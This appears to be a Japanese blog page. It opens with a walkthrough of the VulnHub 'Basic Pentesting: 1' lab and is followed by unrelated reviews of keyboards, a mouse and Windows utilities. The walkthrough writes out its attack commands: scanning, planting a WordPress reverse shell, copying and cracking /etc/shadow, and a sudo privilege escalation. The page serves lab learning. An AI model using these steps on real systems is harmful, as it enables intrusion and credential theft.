【VulnHub】Basic Pentesting: 1
「Basic Pentesting: 1」は、「Josiah Pierce」によって開発され、VulnHubにて公開されているシリーズの一つです。
■環境
Attack machine(parrot OS)IP:192.168.56.101
Target machine(ubuntu OS)IP:192.168.56.105
■手順
1.nmap(ポートスキャン)
2.gobuster(ディレクトリ・ブルートフォース・アタック)
3.wpログイン
4.404.phpへrevarce shellのコードを作成
5.passwdとshadowを強奪
6.john the ripperでhash化されたパスワードをクラック
7.ssh接続
=========================================================
1.nmap(ポートスキャン)
以下のコマンドを実施。
$ nmap -sV -T4 192.168.56.105 -p-
2.ブラウザーでPort80へアクセス。
収穫特になし
3.gobusterを実行
$ sudo gobuster dir -u http://192.168.56.105/ -w /usr/share/wordlists/dirb/big.txt
4.gobusterで見つけた/secretへアクセス
5.ブラウザーのアドオンで「wappalyzer」を使用してみたところWPを使用していることが分かった。そこから考察をするにWPの管理ページが存在すると思われる。
6.再度gobusterを使用して調べる。
$sudo gobuster dir -u http://192.168.56.105/secret/ -w /usr/share/wordlists/dirb/big.txt
7.これは経験から取り合ず、admin:adminでログインしたら入れた。
ちゃんとログイン情報を調べるなら色々やり方はあるが、burp suiteでも使えばいいと思う。
【ログイン前】
【ログイン後】
8.「Appearance」→「Editor」をクリックして、右側の404 Templateをクリック。
9.404.phpへ以下のURLのコードを張り付けて、以下の箇所を変更して、
「Update File」のボタンをクリック。
============================
$ip = '192.168.56.101'; // CHANGE THIS
$port = 1234; // CHANGE THIS
============================
10.NetCatを使用してport1234で接続を待ち受ける状態にする。
$ nc -lnvp 1234
11.編集した404.phpへアクセスし接続待ちのポートへ接続が確立したことを確認。
http://vtcsec/secret/index.php/404.php
12./etc/passwdと/etc/shadowをローカルPCへコピーをする
$ ls -al /etc/passwd
$ls -al /etc/shadow
右側$ cat /etc/passwd
左側$ vi passwd
左側$cat /etc/shadow
右側$vi shadow
13.John The Ripperにてpasswdとshadowのパスワードクラック。
$ unshadow passwd shadow > hash.txt
$john hash.txt
$john hash.txt --show
14.johnで摘出できたユーザとパスワードを使用して、sshでログイン。
ユーザ名:marlinspike
パスワード:marlinspike
15.色々と調べた結果sudo -uの脆弱性を利用して管理者へ昇格
$sudo -u#-1 /bin/bash
16.whoamiコマンドとidコマンドを実施して、以下の表示がされればOK
◆補足:
sudo の脆弱性を見つけたきっかけになったツールが実はございまして、リンク張っておきます。
これ以外にも、niktoやhydraなどのツールを今回使いました。
今までvulnhubを使用して学習をしてましたが、今回初めて答えを見ずに最後までハッキングすることができました。
感動です。
このVMを作成してくれたJosiah Pierceさん、ありがとうございます。
エンジニア御用達ツール3選!!! (Windows編)
どうも。Alien_Engineer(Twitter:@Alien_Engineerz )です。
今回は私現役のインフラエンジニアが紹介する、
実際に私が使用している無料で使えるツールを10個ほど紹介します。
それでは早速紹介します。
▼Claunch
これはショートカットを登録するためのツールです。
「ショーカットならデスクトップに置けばいいじゃん。」という声が。。。
こちらのツールは、種類ごとでツールを分けられたり
デスクトップがごちゃごちゃしません。
私はデスクトップには一切ショートカットを作成していません。
ちなみにショートカットの登録方法ですが、登録したい親フォルダーを開いて
特定のファイルなどをClaunchでドラック&ドロップするだけ
Claunchのダウンロード先はこちら
▼WinSCP
これはFTPで接続してサーバへファイルを置いたりするのに使用してます。
本来はSSH接続するときと同様にコマンドで行わなければいけません。
それをGUIベースで操作を可能してくれるのがこのツール。
ファイルの移動、削除、作成だけでなく接続先のサーバのログイン情報を
保持してくれるので、いちいちログインするたびにパスワードを打ち込まなくてよい
ので楽です。
WinSCPのダウンロード先はこちら
▼ChgKey
このツールは、使用しないキーを無効化するためのツールです。
たまに必要ないキーを押してしまったりしません?
それをなんとかしてくれる奴です。
私はcapsキーとintキーを無効に設定してます。
Chgkeyのダウンロード先はこちら
せっかくWindowsを使用しているならフリーソフトを使いこなしましょう。
【レビュー】Razer Huntsman Mini(Linear Optical Switch)
どうも。Alien_Engineer(Twitter:@Alien_Engineerz )です。
さて本日は、『Razer Huntsman Mini』の紹介をしていきたいと思います。
「キーボードの大きさによってデスクが狭くなっている」
「テレワークになって、自宅で仕事をすることが増えたがゲーミングデバイスを使っているため、Webでの打ち合わせの時に気を遣う」
こんな悩みを持っている方、いらっしゃったりしませんか??
ゲーミングキーボードは「カチャカチャ」うるさいものが多いイメージがありますが
これはキーボードについている「軸」が原因となります。
今回はその悩みを解決してくれ、仕事でも使えるゲーミングキーボード、
『Razer Huntsman Mini』を紹介します。
▼こんな方にオススメ
①ゲームと仕事を同じキーボードで使用したい方
②光るキーボードが欲しい方
③光り方をこだわりたい方
~もくじ~
①Razer Huntsman Mini/概要
②Razer Huntsman Mini/キーボード本体
③Razer Huntsman Mini(リニアオプティカルスイッチ)/打ち心地
④Razer Huntsman Mini/よかったところ、ちょっと気になった点
⑤Razer Huntsman Mini/まとめ
▼概要
購入はネットの通販や家電量販店での購入が可能です。
カラーが2種類あり、ブラックとホワイトがあります。
また、配列にも2種類あり、英語配列と日本語配列の2つがあります。
さらに軸についても2種類あり、『クリッキーオプティカルスイッチ※1』と
『リニアオプティカルスイッチ※2』があります。
※1クリッキーオプティカルスイッチの説明
・アクチュエーション距離:1.5mm | アクチュエーションフォース:45g
・満足できる操作感と音と共に歯切れのよい、タクタイル感のあるフィードバックを
求めるゲーマーの必携モデル。(カチャカチャとした音が特徴)
※2リニアオプティカルスイッチの説明
・アクチュエーション距離:1.2mm | アクチュエーションフォース:48g
・タクタイルバンプのないスムーズで瞬時のキーストロークを実現するこの第 2 世代
の設計は、キーを押しこんだときに出る音を抑えてスイッチ音を大きく
改善しています。(静音化されているもの)
▼キーボード本体
上の画像はすでにドライバーで光らせ方の設定をしたものになりますが、
光らせ方も好みに合わせてカスタマイズができてかなり自由自在に設定ができます。
人の設定ファイルをインターネットでダウンロードして設定することも可能です。
また、ドライバーは接続した時点で、自動でダウンロードされます。
これに関しては手間が省けるていいという人もいれば、勝手に落とすなという人も
いるので何とも言えませんね。
※1段階目
※2段階目
キーボードは画像の通り2段階でスタンドが使えます。
私は高いほうが使い安ので2段階目で使用してます。
▼打ち心地
打鍵音については、ここのリンクに行ってもらえればと思います。
※1st Genがクリッキーオプティカルスイッチの音(カチャカチャ音が鳴る方)。
※2nd Genがリニアオプティカルスイッチの音(静音化された方)。
音の割に少しキーの押し心地が重いなと感じます。
これは人の好みかもしれませんが、私はもう少し軽いほうが個人的には好きです。
▼よかったところ、ちょっと気になったところ
よかったところは、
・キーボードが小さくなってくれたので、机が広く使える。
・必要なキーが凝縮されている感じでスタイリッシュで見た目がかっこいい。
・キーボードの光らせ方が、自由で面白い。
ですかね。
ちょっと気になったところは、
・矢印キーを使用するのに、FNキーを使用しないといけないのが面倒。
・FNキーを押したときに有効な箇所だけ光るのですが、FNキーを押したときに
矢印キーのところのみの色を変更で気なかったのでそこが不便。
(だいぶ気になりました、慣れるまで押し間違えが多々ありました。)
くらいですかね。
▼まとめ
全体的には満足していますが、特に気に入ったのがコンパクトさと
光らせ方についてはすごく満足でした。
かなりかっこいいです。
でも、作業効率を考えると矢印キーはあった方がいいと思いました。
また、私はテンキーはあまり使用しないのでもともとなくてもいいので
気にはなりませんでした。
以上、今回はこんなかんじですかね。
また気が向いたときに記事を上げるので見てくれると嬉しいです!
ほかにレビューしてほしいものがあればコメントかTwitterのDMでいただけると嬉しいです!
【レビュー】Razerのピカチューマウス!?!?!?
どうも。Alien_Engineer(Twitter:@Alien_Engineerz)です。
今回はただの自慢話をしたいと思います。
先日メルカリで、RAZERから結構前に販売された海外限定品のピカチュウマウスが
出品されていたので即購入しました。
ねずみ年を記念して中国限定で販売したとかなんとか。。。
しかし、普通に使うのはあまり気乗りしないので、コレクションとして購入しました。
とはいえ軽く使ってみたのでざっくりレビューしたいと思います。
~もくじ~
①開封
②サイズ感
③接続方法
④使用感
⑤まとめ
▼開封
中身を説明すると
・マウス本体
・電池
・説明書
のみでした。
びっくりするようなことはそこまでなかったですかね~
▼サイズ感
結構小さめですね~
重さは電池がないような状態で結構重めでした。
そこに電池が入るともっと重くなると考えると画像の右側のG703と変わらないかもしれませんね。
▼使用感
冒頭で言った通り、コレクションとして購入したので使用感についてはわからないです。
ちょっと調べてみたのですが、このマウス日本で使うと電波法に違反するらしい。
こわ!
▼まとめ
見た目はとてもかわいいですが、実際に使うなら中国に行かないと。。。という感じですね。
コレクションとしてはきにいってます!
結構かわいいので。
マウスにも違う種類があるのと他に、キーボード、マウスパッド、ワイヤレスイヤホンがあるらしいです。
また、見つけたら買いますかね。
【レビュー】「Varmilo」Beijing Opera ANSI VA87 Cherry MX シルバー軸(英語配列)
どうも。Alien_Engineer(Twitter:@Alien_Engineerz)です。
「中国製の製品ってどうなの?」
「中国の製品はしっかりしていないんじゃないか?」
中国製品にこんな印象をお持ちではないでしょうか?
確かに中国製品って『壊れやすい』だったり、『不安が的中』するような商品もあります。
しかし、ちゃんとした商品もあります。
丈夫なのはもちろん、デザインも日本にはない『かわいい&かっこいいキーボード』があるのはご存じでしょうか??
それがビックカメラなどで販売されている『Varmilo Beijing Opera』とういうキーボード。
メカニカルキーボードといえば『Razer』『Logicool』といったザ・ゲーミングといったデザインがほとんどなのですが、Varmilo Beijing Operaは『かわいい&かっこいい』
打鍵間(私のはシルバー軸)で打鍵間もとてもよく、なにより、ほかの人があまり持っていないデザイン性にひかれて、買っちゃいました!
この記事では、かわいくもありかっこよくもある派手なデザインの『Varmilo Beijing Opera』の紹介をします。
▼こんな方にオススメ!
①個性的なキーボードがほしい!
②打鍵間の良いキーボードがほしい!
③長く使えるキーボードがほしい!
![VARMILO ゲーミングキーボード Beijing Opera ANSI VA87 Cherry MX シルバー軸(英語配列) vm-va87-ll3dj2pv-silver [USB /有線] 87LL3DJ2PVSILVER](https://thumbnail.image.rakuten.co.jp/@0_mall/dtc/cabinet/mc2246/1123423.jpg?_ex=128x128 "VARMILO ゲーミングキーボード Beijing Opera ANSI VA87 Cherry MX シルバー軸(英語配列) vm-va87-ll3dj2pv-silver [USB /有線] 87LL3DJ2PVSILVER")
~もくじ~
①Varmilo Beijing Opera/概要
②Varmilo Beijing Opera/開封
・キーホルダーついてる?!
・キーキャップ
③Varmilo Beijing Opera/キーボード本体
・独特なデザイン
・高さ調整可能なスタンド付き
・キースイッチは「シルバー軸」選択
④Varmilo Beijing Opera/打ち心地は?
⑤Varmilo Beijing Opera/ちょっと気になる点
⑥Varmilo Beijing Opera/まとめ
▼概要
購入先は、ビックカメラでも取り扱いがあり実物を見てから購入することが可能です。
※公式店であれば、好きな軸が選べます。
キー列は、87キー(上記の画像と同じもの)、108キーの2種類。
軸のラインナップは、
・黒軸
・茶軸
・青軸
・赤軸
・静音赤軸
・静音黒軸
・シルバー軸
・クリア軸
の種類があります。
『軸(スイッチ)』についてはこちらを参考にしてください。
私は、『カタカタ』という音が好きなのでシルバー軸にしました。
▼開封 
・キーボード本体
・キーホルダー
・取り換えキーキャップ
・USBケーブル
・キー引き抜き工具
・説明書
なんとキーのキーホルダーがついてきます!
▼キーボード本体
キーキャップのいると文字も結構おしゃれ!
そしてスペースキーも独特のデザイン!
かわいくもありかっこよくもある!
▼高さ調整可能なスタンド付き
フラットな状態だとこんな感じです。
このスタンドを上げると
こんな感じになります。
私はキーボードに確度があったほうが、タイピングしやすいので
スタンドを立てて使用してます。
▼キースイッチは『シルバー軸』を選択。
シルバー軸は『カタカタ』音がなるもので、打鍵間がとても良いです。
音もとても気持ちが良いです。
▼打ち心地は?
カタカタととてもリズミカルに、打っていて気持ちがいいです。
押し心地もとても軽いです。
タイピングオンについては、Twitterのほうで載せているので聞いてみていただけたら
と思います。
昨日買ったキーボードの音がマジでいい!
— Alien_Engineer (@Alien_Engineerz) 2021年1月21日
伝わらないかな💦
今日1日使って見て思ったのは、キーの押しがちょうどいい!(人によると思うけど)
タイピングしてる時の気持ちよさも凄い! pic.twitter.com/j56TKpjEel
▼ちょっと気になる点
気になる点としてはUS配列しかなく、日本語配列がない点です。
デスクトップであれば、設定変更をすれば済む話なのですが、
ノートPCの場合、ノートPCについているキー配列とことなってしまうため、
ちょっと使いずらいかもしれません。
ただ英語配列のノートPCを使っているのであれば問題はないですね。。。
▼まとめ
少し値段は高いですが、買ってよかったキーボードでした!
打鍵感もいいし、デザインもとても気に入っています!
ここまで『Varmilo Beijing Opera』を使って書いていたのですが、
音が気持ちよくタイプするのがとても楽しかったです!
かわいくもありかっこよくもある『Varmilo Beijing Opera』個性がありとてもおススメです!
![Varmilo アミロ vm-va108-ll3dj2pv-silver ゲーミングキーボード Beijing Opera ANSI VA108 Cherry MX 銀軸 (英語配列) [USB /有線]](https://thumbnail.image.rakuten.co.jp/@0_mall/biccamera/cabinet/product/5614/00000008232785_a01.jpg?_ex=128x128 "Varmilo アミロ vm-va108-ll3dj2pv-silver ゲーミングキーボード Beijing Opera ANSI VA108 Cherry MX 銀軸 (英語配列) [USB /有線]")
